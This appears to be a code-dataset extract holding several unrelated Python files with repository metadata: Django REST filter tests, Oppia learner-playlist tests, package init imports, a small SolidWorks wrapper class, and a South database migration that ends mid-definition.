tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 18
|
2016-10-01T21:30:22.000Z
|
2022-03-28T10:51:41.000Z
|
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
from ..testapp.models import Caretaker
class DateTimeFiltersTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('test')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='test')
self.assertTrue(r)
Caretaker(name='Peter', last_seen='2017-03-24T14:44:55Z').save()
Caretaker(name='Stefan', last_seen='2017-03-23T11:26:14Z').save()
def test_datetime_filter_exact_match(self):
response = self.client.get('/caretaker/', data={'.last_seen': '2017-03-24T14:44:55Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
# Alt syntax
response = self.client.get('/caretaker/', data={'.last_seen': '2017-03-23T12:26:14+0100'})
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
def test_datetime_filter_range(self):
response = self.client.get('/caretaker/', data={'.last_seen:range': '2017-03-24T14:44:54Z,2017-03-24T14:44:56Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
# Alt syntax
response = self.client.get('/caretaker/', data={'order_by': 'name', '.last_seen:range': '2017-03-23T10:00:00+0100,2017-03-25T00:00:00+0100'})
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
self.assertEqual('Stefan', result['data'][1]['name'])
def test_datetime_filter_gte_match(self):
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-23T11:26:14Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
self.assertEqual('Peter', result['data'][1]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-23T12:00:00Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gte': '2017-03-25T00:00:00Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_datetime_filter_gt_match(self):
# One second before earliest "last seen"
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23T11:26:13Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Stefan', result['data'][0]['name'])
self.assertEqual('Peter', result['data'][1]['name'])
# One second later (exactly _on_ earliest "last seen")
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23T11:26:14Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Peter', result['data'][0]['name'])
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-25T00:00:00Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_datetime_filter_syntax_variations(self):
# Precise milliseconds
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23T11:26:13.9999Z', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
# Implicitly we add T23:59:59Z here to make this correct.
response = self.client.get('/caretaker/', data={'.last_seen:gt': '2017-03-23', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
# Same as above, but to the range start we add T00:00:00Z
response = self.client.get('/caretaker/', data={'.last_seen:range': '2017-03-23,2017-03-23', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
# Just a sanity check
response = self.client.get('/caretaker/', data={'.last_seen:range': '2017-03-23,2017-03-24', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
# You can't mix and match date and datetime syntax
response = self.client.get('/caretaker/', data={'.last_seen:range': '2017-03-23T00:00:00Z,2017-03-24', 'order_by': 'last_seen'})
self.assertEqual(response.status_code, 418)
def test_datetime_filter_syntax_errors_cause_error_response(self):
response = self.client.get('/caretaker/', data={'.last_seen': '1838-05'})
self.assertEqual(response.status_code, 418)
response = self.client.get('/caretaker/', data={'.last_seen': '1838-05-01-02'})
self.assertEqual(response.status_code, 418)
# Incomplete timestamp
response = self.client.get('/caretaker/', data={'.last_seen': '1838-05-01T02:10'})
self.assertEqual(response.status_code, 418)
# Missing +/- (or too many seconds)
response = self.client.get('/caretaker/', data={'.last_seen': '1838-05-01T02:10:0220'})
self.assertEqual(response.status_code, 418)
def test_datetime_isnull(self):
# Due to corona, I forgot when I last saw bob
Caretaker(name='Bob', last_seen=None).save()
response = self.client.get('/caretaker/', data={'.last_seen:isnull': 'True'})
result = jsonloads(response.content)
# We only get bob back with no data
self.assertEqual(1, len(result['data']))
self.assertEqual('Bob', result['data'][0]['name'])
def test_datetime__isnull_false(self):
# Due to corona, I forgot when I last saw bob
Caretaker(name='Bob', last_seen=None).save()
for false_value in ['0', 'false', 'False']:
response = self.client.get('/caretaker/', data={'.last_seen:isnull': false_value})
result = jsonloads(response.content)
# We only get bob back with no data
self.assertEqual(2, len(result['data']))
self.assertNotEqual('Bob', result['data'][0]['name'])
self.assertNotEqual('Bob', result['data'][1]['name'])
| 37.318681
| 143
| 0.703916
| 952
| 6,792
| 4.917017
| 0.168067
| 0.1442
| 0.080752
| 0.094211
| 0.813074
| 0.777612
| 0.751335
| 0.728904
| 0.722709
| 0.684469
| 0
| 0.070378
| 0.108804
| 6,792
| 181
| 144
| 37.524862
| 0.702957
| 0.077444
| 0
| 0.554545
| 0
| 0.009091
| 0.22976
| 0.03728
| 0
| 0
| 0
| 0
| 0.436364
| 1
| 0.081818
| false
| 0.018182
| 0.036364
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6fc3609aaf1967d30459104f70f9cdc36f01204
| 14,561
|
py
|
Python
|
core/controllers/learner_playlist_test.py
|
oswalgopal/oppia
|
7513e8eca5adc278974ad266b0ea3f59a646983d
|
[
"Apache-2.0"
] | 2
|
2021-04-08T01:06:08.000Z
|
2021-06-02T08:20:13.000Z
|
core/controllers/learner_playlist_test.py
|
gitter-badger/oppia
|
7d8e659264582d7ce74bc6c139e597b82bca0e04
|
[
"Apache-2.0"
] | 35
|
2019-02-23T20:31:21.000Z
|
2019-08-19T12:32:13.000Z
|
core/controllers/learner_playlist_test.py
|
gitter-badger/oppia
|
7d8e659264582d7ce74bc6c139e597b82bca0e04
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:20:56.000Z
|
2021-01-28T05:20:56.000Z
|
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the learner playlist."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from constants import constants
from core.domain import learner_playlist_services
from core.domain import learner_progress_services
from core.tests import test_utils
import feconf
import python_utils
class LearnerPlaylistHandlerTests(test_utils.GenericTestBase):
OWNER_EMAIL = 'owner@example.com'
OWNER_USERNAME = 'owner'
EXP_ID_1 = 'exp_id_1'
EXP_TITLE_1 = 'exp title 1'
EXP_ID_2 = 'exp_id_2'
EXP_TITLE_2 = 'exp title 2'
EXP_ID_3 = 'exp_id_3'
EXP_TITLE_3 = 'exp title 3'
EXP_ID_4 = 'exp_id_4'
EXP_TITLE_4 = 'exp title 4'
COL_ID_1 = 'col_id_1'
COL_TITLE_1 = 'col title 1'
COL_ID_2 = 'col_id_2'
COL_TITLE_2 = 'col title 2'
COL_ID_3 = 'col_id_3'
COL_TITLE_3 = 'col title 3'
COL_ID_4 = 'col_id_4'
COL_TITLE_4 = 'col title 4'
def setUp(self):
super(LearnerPlaylistHandlerTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
# Save the explorations.
self.save_new_default_exploration(
self.EXP_ID_1, self.owner_id, title=self.EXP_TITLE_1)
self.save_new_default_exploration(
self.EXP_ID_2, self.owner_id, title=self.EXP_TITLE_2)
self.save_new_default_exploration(
self.EXP_ID_3, self.owner_id, title=self.EXP_TITLE_3)
self.save_new_default_exploration(
self.EXP_ID_4, self.viewer_id, title=self.EXP_TITLE_3)
# Save the collections.
self.save_new_default_collection(
self.COL_ID_1, self.owner_id, title=self.COL_TITLE_1)
self.save_new_default_collection(
self.COL_ID_2, self.owner_id, title=self.COL_TITLE_2)
self.save_new_default_collection(
self.COL_ID_3, self.owner_id, title=self.COL_TITLE_3)
self.save_new_default_collection(
self.COL_ID_4, self.viewer_id, title=self.COL_TITLE_4)
def test_add_exploration_to_learner_playlist(self):
self.login(self.VIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
# Add one exploration to the playlist.
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_1), {},
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_1])
# Add another exploration.
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_2), {},
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_1, self.EXP_ID_2])
# User rearranges the explorations. 'exp title 2' is shifted to the
# first position.
payload = {
'index': 0
}
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_2), payload,
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])
# If an exploration belongs to the incomplete list or completed list, it
# should not be added. Here we test for the completed case.
learner_progress_services.mark_exploration_as_completed(
self.viewer_id, self.EXP_ID_3)
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_3), {},
csrf_token=csrf_token)
self.assertEqual(
response['belongs_to_completed_or_incomplete_list'], True)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])
# If an exploration belongs to one of the subscribed explorations,
# it should not be added to the learner playlist.
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_4), {},
csrf_token=csrf_token)
self.assertEqual(
response['belongs_to_subscribed_activities'], True)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_2, self.EXP_ID_1])
# Now we begin testing of not exceeding the limit of activities in the
# learner playlist.
# Add feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT - 2 activities to reach
# the maximum limit.
for exp_id in python_utils.RANGE(
5, feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3):
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
'exp_id_%s' % exp_id), {},
csrf_token=csrf_token)
# Now if we try and add an activity we should get a message saying we
# are exceeding the limit.
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
'exp_id_%s' %
python_utils.UNICODE(
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3)),
{}, csrf_token=csrf_token)
self.assertEqual(response['playlist_limit_exceeded'], True)
self.logout()
def test_add_collection_to_learner_playlist(self):
self.login(self.VIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
# Add one collection to the playlist.
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
self.COL_ID_1), {},
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_1])
# Add another exploration.
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
self.COL_ID_2), {},
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_1, self.COL_ID_2])
# User rearranges the explorations. 'exp title 2' is shifted to the
# first position.
payload = {
'index': 0
}
self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
self.COL_ID_2), payload,
csrf_token=csrf_token)
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_2, self.COL_ID_1])
# If an exploration belongs to the incomplete list or completed list, it
# should not be added. Here we test for the completed case.
learner_progress_services.mark_collection_as_completed(
self.viewer_id, self.COL_ID_3)
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
self.COL_ID_3), {},
csrf_token=csrf_token)
self.assertEqual(
response['belongs_to_completed_or_incomplete_list'], True)
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_2, self.COL_ID_1])
# If a collection belongs to one of the subscribed collections,
# it should not be added to the learner playlist.
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
self.COL_ID_4), {},
csrf_token=csrf_token)
self.assertEqual(
response['belongs_to_subscribed_activities'], True)
self.assertEqual(
learner_playlist_services
.get_all_collection_ids_in_learner_playlist(
self.viewer_id), [self.COL_ID_2, self.COL_ID_1])
# Now we begin testing of not exceeding the limit of activities in the
# learner playlist.
# Add feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT - 2 activities to reach
# the maximum limit.
for exp_id in python_utils.RANGE(
5, feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3):
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
'col_id_%s' % exp_id), {},
csrf_token=csrf_token)
# Now if we try and add an activity we should get a message saying we
# are exceeding the limit.
response = self.post_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION,
'exp_id_%s' %
python_utils.UNICODE(
feconf.MAX_LEARNER_PLAYLIST_ACTIVITY_COUNT + 3)),
{}, csrf_token=csrf_token)
self.assertEqual(response['playlist_limit_exceeded'], True)
self.logout()
def test_remove_exploration_from_learner_playlist(self):
self.login(self.VIEWER_EMAIL)
# Add explorations to the learner playlist.
learner_progress_services.add_exp_to_learner_playlist(
self.viewer_id, self.EXP_ID_1)
learner_progress_services.add_exp_to_learner_playlist(
self.viewer_id, self.EXP_ID_2)
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_1, self.EXP_ID_2])
# Remove an exploration.
self.delete_json(
'%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_1))
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_2])
# Removing the same exploration again has no effect.
self.delete_json('%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_1))
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [self.EXP_ID_2])
# Remove the second exploration.
self.delete_json('%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_2))
self.assertEqual(
learner_playlist_services.get_all_exp_ids_in_learner_playlist(
self.viewer_id), [])
self.logout()
def test_remove_collection_from_learner_playlist(self):
self.login(self.VIEWER_EMAIL)
# Add collections to the learner playlist.
learner_progress_services.add_collection_to_learner_playlist(
self.viewer_id, self.COL_ID_1)
learner_progress_services.add_collection_to_learner_playlist(
self.viewer_id, self.COL_ID_2)
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_1, self.COL_ID_2])
# Remove a collection.
self.delete_json('%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_1))
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_2])
# Removing the same collection again has no effect.
self.delete_json('%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_1))
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [self.COL_ID_2])
# Remove the second collection.
self.delete_json('%s/%s/%s' % (
feconf.LEARNER_PLAYLIST_DATA_URL,
constants.ACTIVITY_TYPE_COLLECTION, self.COL_ID_2))
self.assertEqual(
learner_playlist_services.get_all_collection_ids_in_learner_playlist( # pylint: disable=line-too-long
self.viewer_id), [])
self.logout()
| 41.366477
| 113
| 0.635533
| 1,839
| 14,561
| 4.659598
| 0.100598
| 0.136539
| 0.029408
| 0.04668
| 0.854475
| 0.819816
| 0.796359
| 0.770802
| 0.724589
| 0.724472
| 0
| 0.011124
| 0.28384
| 14,561
| 351
| 114
| 41.48433
| 0.810606
| 0.176087
| 0
| 0.715385
| 0
| 0
| 0.047607
| 0.015757
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.019231
| false
| 0
| 0.030769
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc0a8fb65ba51e4457fbb5ca3688e346a072798b
| 336
|
py
|
Python
|
src/stk/ea/__init__.py
|
andrewtarzia/stk
|
1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/ea/__init__.py
|
JelfsMaterialsGroup/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/ea/__init__.py
|
supramolecular-toolkit/stk
|
0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
from .crossover import * # noqa
from .fitness_calculators import * # noqa
from .mutation import * # noqa
from .fitness_normalizers import * # noqa
from .plotters import * # noqa
from .selection import * # noqa
from .generation import * # noqa
from .evolutionary_algorithm import * # noqa
from .molecule_records import * # noqa
| 33.6
| 45
| 0.732143
| 40
| 336
| 6.05
| 0.375
| 0.371901
| 0.46281
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 336
| 9
| 46
| 37.333333
| 0.886447
| 0.130952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc3c1ffac10dea924a7e5536f41609b58815f627
| 175
|
py
|
Python
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 16
|
2020-11-03T14:40:30.000Z
|
2022-03-02T15:38:40.000Z
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 2
|
2021-03-02T12:10:24.000Z
|
2021-11-19T21:34:47.000Z
|
swtoolkit/api/interfaces/idrawingdoc.py
|
szcyd-chian/soliwordsapi
|
87d496f82f40febee3bdf4de878064a98a82c005
|
[
"MIT"
] | 8
|
2020-11-11T12:25:58.000Z
|
2022-03-28T06:06:44.000Z
|
class IDrawingDoc:
def __init__(self, system_object):
self.system_object = system_object
@property
def _instance(self):
return self.system_object
| 21.875
| 42
| 0.691429
| 20
| 175
| 5.6
| 0.5
| 0.428571
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.24
| 175
| 7
| 43
| 25
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fc7a8ae8697305f8c17541dd36d25921658dd5ad
| 23,542
|
py
|
Python
|
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
src/ralph_assets/migrations/0005_auto__add_field_asset_force_deprecation.py
|
xliiv/ralph_assets
|
73e5e46db380c9a8dafb9ca1bd5abe47d5733385
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Asset.force_deprecation'
db.add_column('ralph_assets_asset', 'force_deprecation',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Asset.force_deprecation'
db.delete_column('ralph_assets_asset', 'force_deprecation')
models = {
'account.profile': {
'Meta': {'object_name': 'Profile'},
'activation_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'birth_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'country': ('django.db.models.fields.PositiveIntegerField', [], {'default': '153'}),
'gender': ('django.db.models.fields.PositiveIntegerField', [], {'default': '2'}),
'home_page': (u'dj.choices.fields.ChoiceField', [], {'unique': 'False', 'primary_key': 'False', 'db_column': 'None', 'blank': 'False', u'default': '1', 'null': 'False', '_in_south': 'True', 'db_index': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'nick': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '30', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'ralph_assets.asset': {
'Meta': {'object_name': 'Asset'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetCategory']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'delivery_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'device_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.DeviceInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'force_deprecation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'invoice_no': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
